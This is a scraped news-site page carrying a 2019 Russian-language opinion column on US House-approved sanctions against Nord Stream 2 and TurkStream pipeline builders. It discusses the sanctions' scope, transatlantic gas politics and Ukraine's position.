swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1612-amerikanskie-sankcii-protiv-severnogo-potoka-luchshe-menshe-chem-nichego" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1612-amerikanskie-sankcii-protiv-severnogo-potoka-luchshe-menshe-chem-nichego"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%90%D0%BC%D0%B5%D1%80%D0%B8%D0%BA%D0%B0%D0%BD%D1%81%D0%BA%D0%B8%D0%B5+%D1%81%D0%B0%D0%BD%D0%BA%D1%86%D0%B8%D0%B8+%D0%BF%D1%80%D0%BE%D1%82%D0%B8%D0%B2+%C2%AB%D0%A1%D0%B5%D0%B2%D0%B5%D1%80%D0%BD%D0%BE%D0%B3%D0%BE+%D0%BF%D0%BE%D1%82%D0%BE%D0%BA%D0%B0%C2%BB%3A+%D0%BB%D1%83%D1%87%D1%88%D0%B5+%D0%BC%D0%B5%D0%BD%D1%8C%D1%88%D0%B5%2C+%D1%87%D0%B5%D0%BC+%D0%BD%D0%B8%D1%87%D0%B5%D0%B3%D0%BE&url=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1612-amerikanskie-sankcii-protiv-severnogo-potoka-luchshe-menshe-chem-nichego&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%90%D0%BC%D0%B5%D1%80%D0%B8%D0%BA%D0%B0%D0%BD%D1%81%D0%BA%D0%B8%D0%B5+%D1%81%D0%B0%D0%BD%D0%BA%D1%86%D0%B8%D0%B8+%D0%BF%D1%80%D0%BE%D1%82%D0%B8%D0%B2+%C2%AB%D0%A1%D0%B5%D0%B2%D0%B5%D1%80%D0%BD%D0%BE%D0%B3%D0%BE+%D0%BF%D0%BE%D1%82%D0%BE%D0%BA%D0%B0%C2%BB%3A+%D0%BB%D1%83%D1%87%D1%88%D0%B5+%D0%BC%D0%B5%D0%BD%D1%8C%D1%88%D0%B5%2C+%D1%87%D0%B5%D0%BC+%D0%BD%D0%B8%D1%87%D0%B5%D0%B3%D0%BE&url=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1612-amerikanskie-sankcii-protiv-severnogo-potoka-luchshe-menshe-chem-nichego&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1612-amerikanskie-sankcii-protiv-severnogo-potoka-luchshe-menshe-chem-nichego" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1612-amerikanskie-sankcii-protiv-severnogo-potoka-luchshe-menshe-chem-nichego"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail"> <a href="https://enovosty.com/print?printajax=4786633" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:0;">&nbsp;</p></div><div class="border">&nbsp;</div> <strong><p>Одобрение более чем двумя третями Палаты представителей США санкций против компаний, причастных к строительству «Северного потока-2», вызвало смешанные чувства. С одной стороны, это давно ожидалось, но рассчитывали на более объемные меры, чем получилось на выходе. С другой стороны, лучше так, чем просто разговоры на эту тему, длившиеся долгие месяцы.</p></strong> <div class="cblock"><img alt="Американские санкции против «Северного потока»: лучше меньше, чем ничего" src="/wp-content/uploads/2019/12/cover_sanktsyy-300x188.jpg" width="300"/></div> <p>Итак, нижняя палата американского Конгресса проявила большое единодушие, одобрив санкции в отношении «строителей обходных потоков». За это решение проголосовали 337 членов палаты представителей из 435 возможных, против &#8212; 49 конгрессменов, в том числе 41 демократ, 6 республиканцев и один независимый депутат, информируют <a class="inform" href="https://enovosty.com/">Экономические Новости</a>.</p><p>Таким образом, несмотря на то, что демократы дали значительное число противников санкций, в целом голосование показало знаменательное единение республиканцев и демократов в этом вопросе. Впрочем, этого следовало ожидать, поскольку, наряду с главным промоутером санкций против «Северного потока» сенатором-республиканцем от Техаса Тедом Крузом, законопроект о санкциях вносила также демократ и сенатор от Нью-Гемпшира Джинн Шейхин, выражающая, надо полагать, мнение значительной части демократов. Единство во мнении по данному вопросу обоих лагерей американского политикума является весьма показательным.</p><p>Такое решение не только налагает собственно санкции, но также вносит определенные нормы в оборонный бюджет на 2020 год. Причем санкции касаются строителей как «Северного потока- 2», так и «Турецкого потока». Принятое решение гласит, что санкции сохранят свое действие также в том случае, если трубопроводы изменят свои названия.</p><p><strong>Что решили и как это будет действовать</strong></p><p class="readlink"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/news_politics/full/1612-kongress-vstal-na-zashhitu-ukraincev-u-trampa-gotovyat-nakazanie-dlya-putinu" >Конгресс встал на защиту украинцев: У Трампа готовят наказание для Путину</a></p><p>Санкции непосредственно коснутся задействованных в указанных трубопроводных проектах судов для прокладки труб в море на глубине 100 футов и ниже. Также санкции будут наложены «на иностранных лиц, которые сознательно продавали, сдавали в аренду или предоставляли эти суда для строительства такого проекта либо способствовали обманчивым или составным операциям для предоставления этих судов для строительства упомянутых газопроводов».</p><p>По мнению упомянутого республиканца-сенатора Теда Круза, «введение санкций против компаний, которые принимают участие в строительстве российского газопровода, приведет к прекращению существования этого проекта, поскольку у России нет технологий для прокладки трубопровода по дну моря». Круз полагает, что в самом крайнем случае введение таких санкций задержит сооружение трубопроводов более чем на год.</p><p>Следует отметить, что Круз считает «<a class="tag" href="https://enovosty.com/tag/severnyj-potok" target="_blank">Северный поток</a>» чуть ли не мировым злом. Он объявил своего рода «крестовый поход» этому проекту, называя его «сговором Меркель и Путина».</p><p class="readlink"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/news_economy/full/3110-posle-predatelstva-danii-ssha-sdelali-gromkoe-zayalenie-po-severnomu-potoku-2" >После предательства Дании США сделали громкое заяление по "Северному потоку-2"</a></p><p>Кроме прочего, санкции предполагают, что совладельцам и сотрудникам компаний, попавшим под санкции, будет отказано в выдаче американских виз, а уже действующие визы будут аннулированы. Кроме того, недвижимость, имущество и прочие активы таких лиц на территории <a class="tag" href="https://enovosty.com/tag/ssha" target="_blank">США</a> будут заморожены, то есть они не смогут ими распоряжаться.</p><p>Для окончательного введение санкций требуется их одобрение Сенатом, то есть верхней палатой Конгресса, а также подписание соответствующего документа Дональдом Трампом. Голосование в Конгрессе намечается на ближайшее время. Наблюдатели пока не видят особых препятствий дальнейшему успешному прохождению и окончательному принятию документа о санкциях.</p><p><img src="https://enovosty.com/wp-content/uploads/2019/12/kongress_ed.jpg" title="Американские санкции против «Северного потока»: лучше меньше, чем ничего" alt="Американские санкции против «Северного потока»: лучше меньше, чем ничего" width="640" height="363" class="aligncenter size-full wp-image-4786635" srcset="https://enovosty.com/wp-content/uploads/2019/12/kongress_ed.jpg 640w, https://enovosty.com/wp-content/uploads/2019/12/kongress_ed-112x64.jpg 112w, https://enovosty.com/wp-content/uploads/2019/12/kongress_ed-300x170.jpg 300w, https://enovosty.com/wp-content/uploads/2019/12/kongress_ed-460x261.jpg 460w" sizes="(max-width: 640px) 100vw, 640px" /></p><p>В случае окончательного принятия дальнейший алгоритм будет следующим: в течение двух месяцев Государственное казначейство США и офис Госсекретаря, являющийся, как известно, аналогом нашего Министерства иностранных дел, должны подать в комитеты Конгресса США совместный доклад, содержащий перечень юридическаих и физических лиц, которые подпадают под санкции. После вступления в силу закона лицам, в него вошедшим, дается 30 дней на то, чтобы прекратить деятельность, связанную со строительством трубопроводов, чтобы не попасть под санкции.</p><p>В «Нафтогазе Украины» считают такие санкции действенными, поскольку Россия не имеет соответствующей техники, а потому вынуждена пользоваться услугами зарубежных компаний, которые такими технологиями располагают, равно как использовать для прокладки подводных трубопроводов специальные иностранные суда и оборудование.</p><p><strong>Ожидали большего, и почему этого не случилось</strong></p><p>В то же время, изначально ожидались куда более жесткие <a class="tag" href="https://enovosty.com/tag/amerikanskie-sankcii" target="_blank">американские санкции</a> в отношении значительно более широкого круга лиц.</p><p>Предлагаемые санкции коснутся, например, Allseas Group SA — швейцарской компании с голландскими корнями, которая специализируется на укладке подводных трубопроводов, монтаже и демонтаже морских платформ, подводном строительстве. Компания располагает судами, технологиями и оборудованием. Здесь, вроде бы, все понятно, особенно если учесть швейцарскую, а не евросоюзную юрисдикцию компании, о чем ниже.</p><p>Однако Allseas – это всего лишь только исполнитель, подрядчик. Дают деньги и «заказывают музыку» куда более серьезные компании, причем далеко не только «Газпром».</p><p>Ранее высказывались предположения, что санкции коснутся европейских участников проекта «Северный поток». Известно, что финансирование проекта ведут и в консорциуме участвуют французская компания Engie, австрийская OMV, британско-голландская Shell, немецкие Uniper и Wintershall. Это крупные транснациональные компании с европейскими корнями, несомненно, имеющие, в том числе, интересы в Америке, а потому логично было бы ввести санкции и против них, но на такие санкции американцы не решились.</p><p>Почему? Потому что это приведет к полномасштабной торгово-экономической войне между Старым и Новым светом, чреватой непредсказуемыми последствиями для глобальной экономики, да еще в условиях уже идущей аналогичной войны между Америкой и Поднебесной. Одно дело «зацепить» морскую фирму-трубоукладчика из Голландии, пристроившуюся в сухопутной, но низконалоговой для иностранцев Швейцарии, а другое &#8212; затронуть одновременно целый ряд транснациональных нефтегазовых корпораций, имеющих мощное политическое лобби, в том числе в Америке. Можно с уверенностью сказать, что, если бы указанные энергокомпании имели шансы попасть в санкционные списки, голосование в Палате представителей США могло бы иметь совершенно другие результаты, и решение вообще могли бы и не принять. </p><p>В Евросоюзе зазвучали недвусмысленные угрозы ввести ответные меры против американского бизнеса, который имеет в Европе огромные интересы, активы и прочее. Прежде всего прозвучали угрозы ввести экспортную пошлину на сжиженный сланцевый газ, с которым американские компании сейчас выходят на европейский энергетический рынок.</p><p>Недавно глава комитета бундестага по экономике и энергетике Клаус Эрнст заявил, что в случае ввода Америкой санкций против стран и/или компаний, принимающих участие в реализации проекта «Северный поток-2», Германия может ввести ответные санкции, например, в виде пошлин на американский сжиженный природный газ (СПГ).</p><p>Следует понимать, что в этом мире все очень непросто, и глобальными игроками движет отнюдь не альтруистическая любовь к справедливости.</p><p>Одной из глобальных целей Америки в последние годы стал выход американского сжиженного газа на европейский рынок. Но рынок этот перенасыщен, желающих поставлять энергоносители в богатенькую платежеспособную Европу хватает с избытком. Достаточно вспомнить хотя бы Алжир и Катар. На европейский рынок под патронатом и при активном участии Турции рвется Азербайджан с его богатыми запасами месторождения «Шах Дениз» и другие. К европейскому рынку присматривается даже бывшая советская Средняя Азия, но там есть мощный конкурент в потреблении в лице Китая. Словом, чтобы застолбить место под солнцем на европейском рынке, американцам нужно кого-то на этом рынке подвинуть, а лучше выдавить с него совсем. В качестве такой мишени они выбрали «Газпром», использовав момент обострения украино-российских отношений из-за московской агрессии и окончания срока действия контракта на транзит российского газа в Европу в условиях, когда «Северный поток» полностью не достроен, а его вывод на проектную мощность является вопросом будущего.</p><p>Не будем сейчас вдаваться в подробности о том, что американский сжиженный природный газ (СПГ) пока что существенно дороже российского. К тому же, доставка СПГ из-за океана еще в достаточной мере не налажена из-за отсутствия соответствующей инфраструктуры. Все это проблемы не завтрашнего дня, а отдаленного будущего.</p><p>Словом, следует понимать, что борьба американцев с «Северным потоком» – это вопрос, прежде всего, геополитических и экономических интересов, а не помощь Украине и ограничение влияния Москвы.</p><p>Очевидно, что в случае, если американцам удастся наладить поставки СПГ в Европу и его продажу там, вытеснив Москву, то Украина точно так же потеряет транзит, как и в случае полноценного запуска «Северного потока».</p><p><strong>А если «Баба Яга» будет против?</strong></p><p>Правда, заявление указанного немецкого депутата о введении Германией пошлин на американский СПГ следует воспринимать со значительным скепсисом. Дело в том, что, будучи членом Евросоюза, Германия сама по себе поднять ввозные таможенные пошлины на что-либо, включая газ, не может. Таким вопросами в Евросоюзе занимается Еврокомиссия (ЕК). Можно, конечно, говорить о том, что Германия является в ЕС «самой главной среди равных», а потому может продавить нужное решение ЕК своим авторитетом. К тому же, буквально недавно ЕС возглавила немка Урсула фон дер Ляйен. Но все же, решения в ЕС принимаются консенсусом, и далеко не все страны настроены резко антиамерикански. Многие государства имеют свои интересы, которые расходятся с интересами Германии. Многим странам газовые разборки Германии и США могут быть безразличными, но они не захотят ссориться с заокеанским гегемоном.</p><p>Собственно, и германского авторитета для продавливания подобных решений может уже и не хватить. После мигрантского кризиса Германия уже не та. Большой урон ее авторитету нанес намеченный на 2021 год уход с политической арены Ангелы Меркель и неопределенность с ее преемником. Да и авторитет самой Меркель после мигрантского кризиса тоже уже не тот.</p><p>Наконец, есть страны, которые являются проамериканскими, и слишком антиамериканские решения могут просто заблокировать. Ярчайшим примером здесь может служить соседняя Польша, которая часто выступает откровенным союзником США. К тому же, Польша, которая, кстати, настроена весьма враждебно против «Северного потока», демонстрирует, пусть и с «выкрутасами», но все же политику отказа от российских энергоносителей с переходом на сжиженный газ, в том числе американский. Выражается это, прежде всего, тем, что Речь Посполитая усиленно строит на своем Балтийском побережье инфраструктуру по приему сжиженного газа.</p><p>Словом, введение Европой любых экономических санкций против Америки, равно как и пошлин на энергоносители, это не такое простое дело.</p><p>Поэтому, повторим, растиражированное московскими медиа заявление Клауса Эрнста, депутата бундестага от левой партии Die Linke, которая «не ровно дышит» к Москве, следует воспринимать достаточно критически. Хотя и отметать такую возможность не стоит.</p><p><strong>А теперь об Украине</strong></p><p>Сейчас трудно сказать, насколько эффективными окажутся санкции США против строителей «Северного потока- 2», конечно, если эти санкции будут окончательно введены. Точно так же пока трудно сказать, какие ответные меры предпримет Европа и предпримет ли она их вообще. Но вот Украина, как ни парадоксально на первый взгляд, кроме выигрыша от возможного стопора в строительстве «Северного потока-2», вполне может поиметь проблемы, если нынешняя власть, как и предыдущая, полезет в чужие «разборки».</p><p>Напомним, что прошлая власть и некоторые грантоеды из шкурных побуждений совершенно безответственно втянули страну в заокеанские разборки между демократами и республиканцами, точнее Трампом, который, строго говоря, не совсем республиканец. Тем самым было осложнено и без того незавидное положение Украины в условиях московской агрессии, о чем приходилось неоднократно <a href="https://enovosty.com/politika/full/1907-ze-komanda-ubiraet-poroshenkovskogo-posla-v-amerike-chalogo-prostyat-li-u-trampa-ukrainagejt-i-kolomojskogo" target="_blank" rel="noopener noreferrer">писать</a>.</p><p>Нечто подобное может произойти и в этот раз. Не успели за океаном принять решение о санкциях, к тому же, как видим, решения эти являются далеко не радикальными, как в Украине уже зазвучали бодрые голоса разнокалиберных чиновников о радостной поддержке американских санкций. Подобные заявления слышались из «Нафтогаза», из МИД от бывшей замминистра Елены Зеркаль и так далее.</p><p>Что значит в данном случае «поддержка Украиной американских санкций против строителей трубопроводов»? Если честно, то ничего, кроме громких заявлений, рассчитанных на обретение благосклонности за океаном.</p><p>Такие санкции – таки да! – на руку Украине, да и то, как сказано выше, в кратко- и среднесрочной перспективе, пока американцы на сумеют залить Европу своим сжиженным газом. Конечно, если сумеют… Действительно, Украина должна этим умело воспользоваться, сумев навязать Москве максимально долгосрочный и выгодный нам контракт. Но следует, повторим, как можно меньше орать на весь мир о своей поддержке чего-то там, на что мы реально не влияем, опять влезая в чужие разборки.</p><p>Возможные последствия уже прозвучали в заявлении упомянутого выше депутата бундестага Клауса Эрнста.</p><p>«Украина получила и получает политическую и финансовую поддержку от Евросоюза и в то же время выступает за экстерриториальные санкции США, которые торпедируют нашу энергетическую политику. Это ставит под вопрос эту помощь от Евросоюза», – заявил депутат бундестага Клаус Эрнст. Как говорится, комментарии излишни.</p><p>Действительно, Украина должна работать с европейскими партнерами в вопросе «Северного потока». Украина, повторим, должна использовать возникшую заминку в сооружении трубопровода и американские санкции для выколачивания из Москвы максимально выгодных для себя условий транзита. Но украинским политиканам, чиновникам и прочим персонажам надо как можно меньше – пардон! – «трындеть», делая громкие, но совершенно глупые заявления и влезая в чужие разборки. Достаточно того, что теперь копеечная американская военная помощь ставится администрацией Трампа в зависимость от того, будет ли Украина давать компромат на основного пока оппонента Трампа на предстоящих выборах – Джозефа Байдена.</p><p>А сейчас наши недалекие функционеры пиарятся громкими дурацкими заявлениями о поддержке американских санкций против строительства трубопроводов. Очевидно, это будет запрет швейцарским сухопутным кораблям швартоваться у причала какой-нибудь Голой Пристани! Так и вспоминается Остап Бендер с его Нью-Васюками!..</p><p>Что же касается собственно готовящихся американских санкций, то, несмотря на их явную ограниченность, лучше уж меньше, чем совсем ничего!</p><div class="tptn_counter" style="color:white;" id="tptn_counter_4786633"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4786633&amp;_wpnonce=63bcb19ebc"></script></div><div class="swp-content-locator"></div><span itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png"/> <meta itemprop="width" content="280"> <meta itemprop="height" content="55"></div><meta itemprop="name" content="Экономические новости" /><meta itemprop="telephone" content="+380958836229"><meta itemprop="address" content="Киев"></span><span itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Александр Карпец"></span><meta itemprop="datePublished" content="2019-12-16T10:52:53+02:00"/><meta itemprop="dateModified" content="2019-12-16T10:52:53+02:00"/><meta itemprop="genre" content="Политика"/><meta itemprop="description" content="Одобрение более чем двумя третями Палаты представителей США санкций против компаний, причастных к строительству «Северного потока-2», вызвало смешанные чувства. С одной стороны, это давно ожидалось, но рассчитывали на более объемные меры, чем получилось на выходе. С другой стороны, лучше так, чем просто разговоры на эту тему, длившиеся долгие месяцы."/><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow"><span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/uploads/2019/12/cover_sanktsyy.jpg"><span itemprop="image" content="https://enovosty.com/wp-content/uploads/2019/12/cover_sanktsyy.jpg"><meta itemprop="width" content="460"><meta itemprop="height" content="288"> </span></span></div></article></div> <div class="postFooter"><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank" style="margin:20px 0;display: block;"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/youtube.jpg"></a> <div id="postAuthor"><span id="authorName" style="margin-right: 25px;float: left;"> <a href="/10573-aleksandr-karpec"><span id="label">Автор: </span>Александр Карпец</a></span><div id="postDate" style="width: 200px;"><span> 16.12.2019 10:52:53 </span><span id="issueNumber"> </span></div><div style="float:right;font: 11px/16px Arial,Verdana,sans-serif;margin-top: -18px;margin-right: 15px;">Посещений: 65</div></div><a href="/10573-aleksandr-karpec"><img src="/wp-content/themes/eizvestia/img/Karpets.jpg" alt="Александр Карпец" title="Александр Карпец"></a><div id="posttags" style="margin:10px 0;">ТЕГИ: <a href="https://enovosty.com/tag/amerikanskie-sankcii" rel="tag">американские санкции</a>, <a href="https://enovosty.com/tag/severnyj-potok" rel="tag">Северный поток</a>, <a href="https://enovosty.com/tag/ssha" rel="tag">США</a></div><div class="voteBox" > </div><br /><p style="color: #a3a3a3;font-size:12px;padding: 0;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1612-amerikanskie-sankcii-protiv-severnogo-potoka-luchshe-menshe-chem-nichego" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1612-amerikanskie-sankcii-protiv-severnogo-potoka-luchshe-menshe-chem-nichego"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%90%D0%BC%D0%B5%D1%80%D0%B8%D0%BA%D0%B0%D0%BD%D1%81%D0%BA%D0%B8%D0%B5+%D1%81%D0%B0%D0%BD%D0%BA%D1%86%D0%B8%D0%B8+%D0%BF%D1%80%D0%BE%D1%82%D0%B8%D0%B2+%C2%AB%D0%A1%D0%B5%D0%B2%D0%B5%D1%80%D0%BD%D0%BE%D0%B3%D0%BE+%D0%BF%D0%BE%D1%82%D0%BE%D0%BA%D0%B0%C2%BB%3A+%D0%BB%D1%83%D1%87%D1%88%D0%B5+%D0%BC%D0%B5%D0%BD%D1%8C%D1%88%D0%B5%2C+%D1%87%D0%B5%D0%BC+%D0%BD%D0%B8%D1%87%D0%B5%D0%B3%D0%BE&url=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1612-amerikanskie-sankcii-protiv-severnogo-potoka-luchshe-menshe-chem-nichego&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%90%D0%BC%D0%B5%D1%80%D0%B8%D0%BA%D0%B0%D0%BD%D1%81%D0%BA%D0%B8%D0%B5+%D1%81%D0%B0%D0%BD%D0%BA%D1%86%D0%B8%D0%B8+%D0%BF%D1%80%D0%BE%D1%82%D0%B8%D0%B2+%C2%AB%D0%A1%D0%B5%D0%B2%D0%B5%D1%80%D0%BD%D0%BE%D0%B3%D0%BE+%D0%BF%D0%BE%D1%82%D0%BE%D0%BA%D0%B0%C2%BB%3A+%D0%BB%D1%83%D1%87%D1%88%D0%B5+%D0%BC%D0%B5%D0%BD%D1%8C%D1%88%D0%B5%2C+%D1%87%D0%B5%D0%BC+%D0%BD%D0%B8%D1%87%D0%B5%D0%B3%D0%BE&url=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1612-amerikanskie-sankcii-protiv-severnogo-potoka-luchshe-menshe-chem-nichego&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1612-amerikanskie-sankcii-protiv-severnogo-potoka-luchshe-menshe-chem-nichego" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fpolitika%2Ffull%2F1612-amerikanskie-sankcii-protiv-severnogo-potoka-luchshe-menshe-chem-nichego"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail" style="float: right; width: 54px; margin-top: 8px;"> <a href="https://enovosty.com/print?printajax=4786633" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:0;">&nbsp;</p></div><div class="border">&nbsp;</div><link rel="stylesheet" type="text/css" media="screen" href="https://enovosty.com/wp-content/plugins/ajax-login/login.css?v=2" /><div id="popup-login"><div class="login"><div class="caption"><span class="title">Вход на сайт</span><a class="link-close" href="#"><span class="close">Закрыть</span></a></div><form name="loginform" id="loginform" action="#" method="post"><p class="error"></p><p class="message"></p><img id="al_loadingImage" alt="Загрузка..." src="https://enovosty.com/wp-content/plugins/ajax-login/al_loading.gif"/><p><label for="user_login">Логин (email):</label><input type="text" name="user_login" id="user_login" class="input" value="" size="20" /></p><p><label for="user_pass">Пароль:</label><input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></p><div class="login-footer"><p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /><label for="rememberme">Запомнить меня</label></p><p class="submit"><input type="button" onClick="sendLogin('https://enovosty.com/wp-content/plugins/ajax-login/login.php', jQuery('#loginform').serialize());return false;" name="wp-submit" id="wp-submit" value="Войти" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="/register" id="wp-register">Зарегистрироваться</a></p></div><fieldset><legend>или</legend><div class="soclogin"> </div></fieldset></form></div></div><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/ajax-login/ajaxlogin.js"></script><input style="width: auto;float: none;background: #2196F3;margin: 5px 0;padding: 0 10px;font-size: 12px;" type="button" value="Вход/Регистрация" id="addanons" name="wp-submit" onclick="get_auth()" ><style type="text/css" media="screen">@import url(/wp-content/plugins/ajax-comment-loading/css/style.css?v=8);</style><noscript>Для загрузки комментариев нужен JavaScript.</noscript><div id="comments-loading" style="display:none">Комментарии...</div><div id="comments-loaded"></div><input type="hidden" name="comments_nonce" value="58070ec5c5" id="comments_nonce" /><script type="text/javascript">document.getElementById('comments-loading').style.display = 'block';</script> </div>  </div><br /><div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px; float:left;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });</script></div><div id='div-gpt-ad-1531304104065-0' style='height:600px; width:300px; float:right;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531304104065-0'); });</script></div><br style="clear:both;"><br /> <div class="wiget simple_pr" style="border-left:none; border-right:none;" id="theme_posts"> <div class="caption "> <p>Политические новости</p><div class="popular-sort"><div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '23,2712', 2712, 10)">месяц</a></div><div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '23,2712', 2712, 10)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '23,2712', 2712, 10)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <h3 class="press"><a href="https://enovosty.com/news_politics/full/912-yolkin-svezhej-karikaturoj-izobrazil-krasnye-linii-zelenskogo">Ёлкин свежей карикатурой изобразил "красные линии" Зеленского (12345)</a></h3><h3 class="press"><a href="https://enovosty.com/news_politics/full/1412-nazvan-ukrainskij-gorod-s-samoj-nizkoj-prestupnostyu">Назван украинский город с самой низкой преступностью (7737)</a></h3><h3 class="press"><a href="https://enovosty.com/news_politics/full/1012-poyavilos-kommyunike-po-itogam-sammita-liderov-normandskoj-chetverki-v-parizhe">Появилось коммюнике по итогам саммита лидеров «Нормандской четверки» в Париже (6416)</a></h3><h3 class="press"><a href="https://enovosty.com/news_politics/full/1212-na-pravax-reklamy-budni-donecka-set-shokirovali-zarplaty-v-dnr">"На правах рекламы – будни Донецка": сеть шокировали зарплаты в "ДНР" (6209)</a></h3><h3 class="press"><a href="https://enovosty.com/news_politics/full/1112-v-rade-opyat-zhestko-podralis-nardepy">В Раде опять жестко подрались нардепы (3588)</a></h3><h3 class="press"><a href="https://enovosty.com/news_politics/full/1212-izvestnyj-zhurnalist-nashel-slabinu-rf-na-donbasse">Известный журналист нашел слабину РФ на Донбассе (3458)</a></h3><h3 class="press"><a href="https://enovosty.com/news_politics/full/1012-foto-dnya-vyrazhenie-lica-putina-ryadom-s-zelenskim-vzorvalo-set">Фото дня: Выражение лица Путина рядом с Зеленским "взорвало" сеть (3291)</a></h3><h3 class="press"><a href="https://enovosty.com/news_politics/full/1312-specnaz-vylomal-dver-v-kieve-nagryanuli-s-obyskami-k-antinu-muxarskomu">"Спецназ выломал дверь": В Киеве нагрянули с обысками к Антину Мухарскому (2924)</a></h3><h3 class="press"><a 